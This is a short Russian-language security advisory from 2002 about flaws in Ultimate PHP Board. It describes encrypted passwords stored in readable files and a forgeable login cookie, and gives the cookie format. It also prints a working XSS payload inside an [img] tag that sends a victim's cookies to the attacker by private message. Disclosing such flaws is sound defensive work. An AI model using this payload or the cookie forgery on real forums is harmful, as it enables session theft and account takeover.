Security Lab

Несколько уязвимостей в Ultimate Bulletin Board

Дата публикации:29.04.2002
Всего просмотров:1811
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: UBB (Ultimate Bulletin Board) - программное обеспечение Web форумов, написанное в Perl.

Зашифрованные UPB пароли пользователя включены в файлы, которые могут быть доступны любому пользователю.

1. Злонамеренный пользователь может создавать куки, используя зашифрованный пароль зарегистрированного UPB пользователя и получать доступ к его учетной записи. Данные UPB cookie используют следующий формат:

ID + 'þ' + 'Xb' + 'encrypted user password'

2. UBB не в состоянии фильтровать Javascript код, внутри тэга IMG. Уязвимость позволяет злонамеренному пользователю перехватывать опознавательные мандаты другого пользователя, основанные на cookie.

[img]javascript:window.open('index.php?upb=pm&mode=send&send=yes&target_id=MY-ID&betreff=cookie&pm='+document.cookie+'&smilies=1&use_upbcode=1&pmbox_id=VICTIME-ID&check=yes')[/img]

Уязвимость обнаружена в X-Crew Ultimate PHP Board 1.0 Beta-1.1

Ссылки: Security holes : Ultimate PHP Board